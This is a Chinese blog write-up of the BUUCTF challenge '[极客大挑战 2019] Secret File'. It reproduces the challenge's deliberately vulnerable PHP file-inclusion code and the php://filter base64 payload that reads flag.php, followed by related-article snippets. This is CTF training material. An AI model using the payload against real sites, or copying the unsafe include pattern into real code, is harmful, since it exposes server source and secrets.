web-[极客大挑战 2019]Secret File

最新推荐文章于 2025-03-19 10:58:15 发布
最新推荐文章于 2025-03-19 10:58:15 发布
阅读量984 收藏 1
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/wojiushilsy/article/details/105623842
版权
本文介绍了一种利用PHP伪协议进行文件包含漏洞攻击的方法。通过构造特定的URL,可以绕过安全检查,访问并读取目标服务器上的敏感文件。文章详细展示了如何使用HTTP请求访问隐藏的flag文件。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

题目要点

  • PHP伪协议

题目内容

在这里插入图片描述

解题

打开页面,F12查看源码,发现一个新页面。访问一下
在这里插入图片描述

点一下跳到另一个页面
在这里插入图片描述

拦截,发现
在这里插入图片描述

访问secr3t.php,发现一段源码

<html>
    <title>secret</title>
    <meta charset="UTF-8">
<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag放在了flag.php里
?>
</html>

可以利用文件包含漏洞(PHP伪协议)构造pyload
http://85435532-2806-4d16-9b44-290434930b87.node3.buuoj.cn/secr3t.php?file=php://filter/read=convert.base64-encode/resource=flag.php
在这里插入图片描述

解码
在这里插入图片描述

BUUCTF系列 // [极客挑战 2019] Secret File
qq_45805420的博客
09-25 629
前言 本题知识点:PHP 文件包含漏洞 & 利用网页背景隐藏信息 WP 进入题目页面,乍看没有什么明显的思路,查看网页源代码,发现源码中出现了部分在页面中被隐藏了的信息,这才意识到了出题者的心思 这个小技巧原理并不复杂,主要是在前端中利用网页的背景颜色来覆盖相同颜色的内容,使得相关信息肉眼不可见,初次相遇确实不易 Get 到思路,可以通过全选页面内容的方式,使所有的信息展现出来 点击隐藏信息,题目跳转到了一个新的页面 尝试点击SECRET按钮,网页再次跳转 根据该页面的信息判断,SECRET
[极客挑战 2019]Secret File
xlcvv的博客
04-05 2536
然后就开启了黑客时代?F12,有一个php文件: 点击: 再点击: 额,那就抓包看一下: 进到secr3t.php里: <html> <title>secret</title> <meta charset="UTF-8"> <?php highlight_file(__FILE__); error_r...
[极客挑战 2019]Secret File1 详解
最新发布
2402_88178163的博客
03-19 1614
得出最后的 flag = 'flag{9795d8ed-2e7f-49cc-abca-c15202fc1fb0}' (这里的题目过关方法和解密方法可能还有很多种 但目前博主的能力只能到这里)我们读一下代码可以发现这里存在一个file的传参值 并且有一个if判断 这里if判断的strstr 这个strstr是执行。我们这时用ctrl+u或者F12看下代码可以发现有一个隐藏目录Archive.room这个我们点这里进入一下。本人为纯技术小白 写下此篇以记录和巩固知识笔记。
BUUCTF Web [极客挑战 2019]Secret File
热门推荐
wangyuxiang946的博客
10-27 1万+
「作者主页」:士别三日wyx   此文章已录入专栏《网络攻防》,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之九十九的同期选手。 [极客挑战 2019]Secret File一、题目简介二、思路分析1)信息泄露2)文件包含三、解题步骤1)查看网页源代码2)拦截请求,查看响应信息3)文件包含漏洞4)PHP伪协议读取文件内容四、总结 一、题目简介 进入链接以后是一个「文字」页面,没有什么特别的功能 二、思路.
BUUCTF Web [极客挑战 2024]Secret File
2401_86454391的博客
09-04 935
进入链接以后是一个「文字」页面,没有什么特别的功能。
[极客挑战 2019]Secret File1
2201_75556700的博客
02-18 485
10.接着我们继续访问flag.php,这里直接读取flag还是看不到内容,联想到估计是用到了php为协议。5.在做web题的时候,一般像出现什么提交信息,点击按钮之类的,都会用到bp抓包。8.点击go,发现右边提示一个 secr3t.php 的页面。9.接下来我们访问该页面,得到如下反映。4.接着点击按钮,页面回显如下。3.点入网址,出现如下页面。
[极客挑战 2019]Secret File wp
{OvEr}的博客
11-18 239
[极客挑战 2019]Secret File 这道题考察的就是代码审计和PHP伪协议 首先打开页面是这样的 然后我们直接查看源代码 注意到蓝色这一行,背景色是black,而“Oh! You found me”这个字的颜色也是黑色,就将其隐藏了起来,我们改掉它的颜色 页面就出现了这个 点击蓝色那行字 我们就跳转到了这个页面,再点击SECRET试试,当然我觉得不会如此轻易就让我们得到flag呢 ...
buuctfmisc [极客挑战 2019]Secret File
01-11
### 极客挑战 2019 Secret File 竞赛题目解析 #### 文件隐藏与访问控制机制分析 在极客挑战 2019 中,`Secret.php` 页面位于特定服务器上 `https://Sycsecret.buuoj.cn`。为了成功获取该页面的内容并最终获得 ...
BUUCTF__[极客挑战 2019]Secret File_题解
风过江南乱的博客
05-18 1323
一、前言 这题真的算简单题了,自己也能很快做出来,不错,终于有一题能自己做出来了。 晚上写完上一篇,看到这题很简单也就简单的写一下。 二、看题 拿到题目 还是 F12 法。 发现了一个 action.php,访问看看 ???查阅结束,可什么也没有啊,再回去,再访问,果然有问题 url 里的是 end.php,可是我们点击访问的是 action.php 有猫腻,可能被重定向了,抓个包看看。果然有东西。 的确被重定向到了 end.php。而且得知 secr3t.php
[极客挑战 2019]Secret File&文件包含常用伪协议以及姿势
m0_68074153的博客
07-28 660
[极客挑战 2019]Secret File&文件包含常用伪协议以及姿势
Secret File
weixin_46580614的博客
07-16 227
打开之后的界面是 审查元素 之后有个跳转页面 直接跳转 然后 真狗 继续跳转 结果没看明白 尝试bp抓包试一下 发现 有东西 看到代码 进行分析 <html> <title>secret</title> <meta charset="UTF-8"> <?php highlight_file(__FILE__); error_reporting(0); $file=$_GET['file']; if(
BUUCTF [极客挑战 2019]Secret File
m0_49025459的博客
04-27 2881
题目 查看网页源代码 <!DOCTYPE html> <html> <style type="text/css" > #master { position:absolute; left:44%; bottom:0; text-align :center; } p,h1 { cursor: default; } </style>
[极客挑战 2019]Secret File 1
weixin_45674567的博客
06-03 1964
访问 可是直接结束 抓包,重发器里改 发现了一个secr3t.php,访问 strstr() — 查找字符串的首次出现 stristr() — strstr() 函数的忽略小写版本 要GET一个file参数过去,但是不能含有…/、tp、input、data,包括这些的小写。不含有这些的话就会包含file指定的文件,php://伪协议 php://filter可以使用 尝试/secr3t.php?file=php://filter/read=convert.base64-encode/resou...
[BUUOOJ][极客挑战 2019]Secret File
Y4tacker的博客
07-29 7343
首先打开页面时这个样子 源码中发现关键php文件 继续看 继续 发现文件包含漏洞 传入的file经过了一些过滤,但是没有过滤filter,我们可以用php://fileter来获取文件。构造url?file=php://filter/convert.base64-encode/resource=flag.php ...
BUU-[极客挑战 2019]Secret File
MateSnake的博客
03-14 4510
BUU-[极客挑战 2019]Secret File
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值